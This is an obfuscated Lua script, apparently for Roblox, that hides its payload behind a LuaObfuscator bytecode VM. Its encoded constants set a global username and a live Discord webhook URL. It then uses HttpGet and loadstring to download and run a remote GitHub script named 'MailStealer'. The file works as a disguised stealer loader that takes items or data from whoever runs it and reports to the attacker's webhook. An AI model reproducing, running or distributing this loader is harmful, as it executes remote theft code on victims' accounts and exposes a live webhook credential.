--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=v2(v0(v30,16));if v19 then local v94=v5(v84,v19);v19=nil;return v94;else return v84;end end end);local function v20(v31,v32,v33)if v33 then local v85=0 -0 ;local v86;while true do if (v85==(0 -0)) then v86=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-((2257 -(1523 + 114)) -(555 + 64))) -(v32-(1 + 0))) + (932 -(857 + 74)))) ;return v86-(v86%(569 -(367 + 201))) ;end end else local v87=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and (1 + (0 -0))) or (877 -(282 + 595)) ;end end local function v21()local v34=0;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==(1270 -(226 + 1024 + 20))) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=(27 + 91) -(32 + 85) ;end end end local function v22()local v36=957 -(655 + 237 + 65) ;local v37;local v38;while true do if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 ;v36=1 -0 ;end if (v36==(351 -(87 + 263))) then return (v38 * (436 -(67 + 113))) + v37 ;end end end local function v23()local v39=0;local v40;local v41;local v42;local v43;while true do if (v39==(2 -1)) then return (v43 * (12338840 + 4438376)) + (v42 * (260471 -194935)) + (v41 * (1208 -(802 + (1147 -(915 + 82))))) + v40 ;end if (v39==0) then v40,v41,v42,v43=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;v39=1 + 0 ;end end end local function v24()local v44=0 -(0 -0) ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(1 + (0 -0))) then v47=1 -0 ;v48=(v20(v46,1188 -(1069 + 118) ,45 -25 ) * (2^(69 -37))) + v45 ;v44=1 + 1 ;end if (v44==3) then if (v49==(0 -0)) then if (v48==(0 + (1080 -(1020 + 60)))) then return v50 * (791 -(368 + (1846 -(630 + 793)))) ;else local v105=0 -0 ;while true do if (v105==(18 -(10 + 8))) then v49=3 -2 ;v47=(1301 -(814 + 45)) -(416 + 26) ;break;end end end elseif (v49==2047) then return ((v48==(0 -0)) and (v50 * ((1 + 0)/(0 -0)))) or (v50 * NaN) ;end return v8(v50,v49-1023 ) * (v47 + (v48/((440 -(145 + (721 -428)))^(482 -(44 + (1307 -921)))))) ;end if (v44==(1486 -(998 + (2310 -1822)))) then v45=v23();v46=v23();v44=1 + 0 ;end if (v44==(2 + 0)) then v49=v20(v46,21,(44 + 759) -(72 + 129 + 571) );v50=((v20(v46,(2055 -(261 + 624)) -(116 + 1022) )==(4 -3)) and  -1) or (1 + 0) ;v44=(4 + 6) -7 ;end end end local function v25(v51)local v52=0 + 0 ;local v53;local v54;while true do if (v52==(1057 -(87 + 968))) then v54={};for v95=1, #v53 do v54[v95]=v2(v1(v3(v53,v95,v95)));end v52=13 -10 ;end if (v52==(0 -0)) then v53=nil;if  not v51 then local v102=1747 -(760 + 283 + 704) ;while true do if (v102==(0 -0)) then v51=v23();if (v51==(1913 -(1789 + 124))) then return "";end break;end end end v52=767 -(745 + 21) ;end if (v52==((5 -3) + 1)) then return v6(v54);end if (v52==(2 -1)) then v53=v3(v16,v18,(v18 + v51) -((379 -(85 + 291)) -2) );v18=v18 + v51 ;v52=1 + 1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v55=0;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v55~=(10 -7)) then else v62=nil;while true do local v97=29 -(22 + 7) ;while true do if (v97~=(0 + 0)) then else local v106=0 + 0 ;local v107;while true do if (v106==0) then v107=0;while true do if (v107~=0) then else local v116=1985 -(1266 + 719) ;while true do if (v116==(603 -(268 + 335))) then if (v56~=1) then else local v167=0;while true do if (v167~=0) then else v61=v23();v62={};v167=1;end if (v167==(291 -(60 + 230))) then local v171=572 -(426 + 146) ;while true do if (1==v171) then v167=2;break;end if (v171==(0 + 0)) then for v174=1,v61 do local v175=1456 -(282 + 1174) ;local v176;local v177;local v178;while true do if (v175==(812 -(569 + 242))) then v178=nil;while true do if (v176~=0) then else local v186=0;local v187;local v188;while true do if (v186==(0 -0)) then v187=0;v188=nil;v186=1 + 0 ;end if (v186==(1025 -(706 + 318))) then while true do if (v187~=(1251 -(721 + 530))) then else v188=1271 -(945 + 326) ;while true do if (v188~=(2 -1)) then else v176=1 + 0 ;break;end if ((700 -(271 + 429))==v188) then v177=v21();v178=nil;v188=1;end end break;end end break;end end end if (v176~=1) then else if (v177==(1 + 0)) then v178=v21()~=0 ;elseif (v177==2) then v178=v24();elseif (v177~=(1503 -(1408 + 92))) then else v178=v25();end v62[v174]=v178;break;end end break;end if (v175~=(1086 -(461 + 625))) then else local v180=1288 -(993 + 295) ;while true do if (v180==1) then v175=1 + 0 ;break;end if (v180~=(1171 -(418 + 753))) then else local v190=0;while true do if ((0 + 0)==v190) then v176=0 + 0 ;v177=nil;v190=1 + 0 ;end if (v190~=(1 + 0)) then else v180=1;break;end end end end end end end v60[532 -(406 + 123) ]=v21();v171=1;end end end if (2==v167) then v56=1771 -(1749 + 20) ;break;end end end if (v56==0) then local v168=0 + 0 ;local v169;local v170;while true do if (v168~=(1322 -(1249 + 73))) then else v169=0;v170=nil;v168=1;end if ((1 + 0)~=v168) then else while true do if (v169==(1145 -(466 + 679))) then v170=0;while true do if (v170~=2) then else v56=1;break;end if (v170~=(2 -1)) then else v59={};v60={v57,v58,nil,v59};v170=2;end if (v170~=(0 + 0)) then else local v179=0;while true do if ((1 + 0)==v179) then v170=2 -1 ;break;end if (v179~=0) then else v57={};v58={};v179=2 -1 ;end end end end break;end end break;end end end v116=115 -(4 + 110) ;end if (v116==1) then v107=585 -(57 + 527) ;break;end end end if (v107==(1428 -(41 + 1386))) then v97=104 -(17 + 86) ;break;end end break;end end end if (1~=v97) then else if ((2 + 0)~=v56) then else local v108=0;local v109;local v110;while true do if (v108~=1) then else while true do if (0==v109) then v110=0;while true do local v161=0;local v162;while true do if (0==v161) then v162=0;while true do if (v162~=0) then else if (v110~=(0 -0)) then else local v173=0 -0 ;while true do if (v173~=0) then else for v181=167 -(122 + 44) ,v23() do local v182=0 -0 ;local v183;while true do if (v182==0) then v183=v21();if (v20(v183,1,1)==0) then local v191=0 -0 ;local v192;local v193;local v194;local v195;while true do if (v191==(1 + 0)) then v194=nil;v195=nil;v191=1 + 1 ;end if (v191~=(0 -0)) then else v192=65 -(30 + 35) ;v193=nil;v191=1;end if (v191~=(2 + 0)) then else while true do if (v192==3) then if (v20(v194,1260 -(1043 + 214) ,11 -8 )~=(1213 -(323 + 889))) then else v195[4]=v62[v195[4]];end v57[v181]=v195;break;end if (v192~=(5 -3)) then else if (v20(v194,1,581 -(361 + 219) )==(321 -(53 + 267))) then v195[1 + 1 ]=v62[v195[2]];end if (v20(v194,2,2)==1) then v195[3]=v62[v195[416 -(15 + 398) ]];end v192=985 -(18 + 964) ;end if (v192~=1) then else local v197=0 -0 ;while true do if (v197==(1 + 0)) then v192=2 + 0 ;break;end if (v197==0) then v195={v22(),v22(),nil,nil};if (v193==(0 + 0)) then local v205=738 -(542 + 196) ;local v206;while true do if (v205==(0 -0)) then v206=0 + 0 ;while true do if (v206==(0 + 0)) then v195[3]=v22();v195[4]=v22();break;end end break;end end elseif (v193==(1 + 0)) then v195[7 -4 ]=v23();elseif (v193==2) then v195[7 -4 ]=v23() -((1553 -(1126 + 425))^(421 -(118 + 287))) ;elseif (v193==(11 -8)) then local v211=1121 -(118 + 1003) ;while true do if (v211~=(0 -0)) then else v195[380 -(142 + 235) ]=v23() -((9 -7)^(4 + 12)) ;v195[4]=v22();break;end end end v197=978 -(553 + 424) ;end end end if (v192==0) then local v198=0 -0 ;while true do if (v198~=1) then else v192=1;break;end if (v198==(0 + 0)) then v193=v20(v183,2 + 0 ,3);v194=v20(v183,3 + 1 ,6);v198=1 + 0 ;end end end end break;end end end break;end end end for v184=1,v23() do v58[v184-(1 + 0) ]=v28();end v173=1;end if (v173~=1) then else v110=1;break;end end end if (v110~=1) then else return v60;end break;end end break;end end end break;end end break;end if (v108==0) then v109=0 -0 ;v110=nil;v108=2 -1 ;end end end break;end end end break;end if (v55==(4 -2)) then local v90=0 + 0 ;local v91;while true do if (v90~=0) then else v91=0;while true do if ((4 -3)==v91) then v55=756 -(239 + 514) ;break;end if (v91==(0 + 0)) then v60=nil;v61=nil;v91=1330 -(797 + 532) ;end end break;end end end if (v55==(1 + 0)) then local v92=0 + 0 ;local v93;while true do if (v92==0) then v93=0 -0 ;while true do if (v93~=0) then else local v111=0;while true do if (v111==1) then v93=1203 -(373 + 829) ;break;end if (v111==0) then v58=nil;v59=nil;v111=732 -(476 + 255) ;end end end if (v93~=(1131 -(369 + 761))) then else v55=2 + 0 ;break;end end break;end end end if (v55~=0) then else v56=0;v57=nil;v55=1 -0 ;end end end local function v29(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v69=v66;local v70=v67;local v71=v68;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v89=0;while true do if (v89==1) then if (v82<=5) then if (v82<=2) then if (v82<=0) then v79[v81[2]]=v81[3]~=0 ;elseif (v82>1) then v79[v81[2]]=v81[3];else do return;end end elseif (v82<=3) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82>4) then v79[v81[2]]=v65[v81[3]];else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=8) then if (v82<=6) then local v113=0;local v114;local v115;while true do if (1==v113) then v79[v114 + 1 ]=v115;v79[v114]=v115[v81[4]];break;end if (v113==0) then v114=v81[2];v115=v79[v81[3]];v113=1;end end elseif (v82==7) then local v124=v81[2];local v125,v126=v72(v79[v124](v13(v79,v124 + 1 ,v81[3])));v74=(v126 + v124) -1 ;local v127=0;for v156=v124,v74 do v127=v127 + 1 ;v79[v156]=v125[v127];end else local v128=0;local v129;while true do if (v128==0) then v129=v81[2];v79[v129]=v79[v129](v13(v79,v129 + 1 ,v74));break;end end end elseif (v82<=10) then if (v82==9) then v73=v81[3];else v79[v81[2]]();end elseif (v82==11) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v65[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v73=v81[3];else local v137;local v138,v139;local v140;local v141;v79[v81[2]]=v65[v81[3]];v73=v73 + 1 ;v81=v69[v73];v141=v81[2];v140=v79[v81[3]];v79[v141 + 1 ]=v140;v79[v141]=v140[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v141=v81[2];v138,v139=v72(v79[v141](v13(v79,v141 + 1 ,v81[3])));v74=(v139 + v141) -1 ;v137=0;for v159=v141,v74 do local v160=0;while true do if (0==v160) then v137=v137 + 1 ;v79[v159]=v138[v137];break;end end end v73=v73 + 1 ;v81=v69[v73];v141=v81[2];v79[v141]=v79[v141](v13(v79,v141 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v73=v81[3];end v73=v73 + 1 ;break;end if (v89==0) then v81=v69[v73];v82=v81[1];v89=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403623O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F486F73742O654875622F6D61696E2F2545322539432539372532304D61696C537465616C657225323025453225394325393703023O005F4703083O00557365726E616D6503083O004561737942652O7203073O00576562682O6F6B037C3O00682O7470733A2O2F646973636F7264612O702E636F6D2F6170692F776562682O6F6B732F4O313339333933363930392O35333O362F39764D5274386639676D33505565452O4D795276646748554C464B72674E4F4C6F336A787A6D413956426956594D625770514B6A4C2O49415A312D73627650476E47356C00153O0012023O00013O0026033O000C000100020004093O000C0001001205000100033O00120C000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O001400010026033O0001000100010004093O00010001001205000100073O00300B00010008000900122O000100073O00302O0001000A000B00124O00023O00044O000100012O00013O00017O00",v9(),...);end
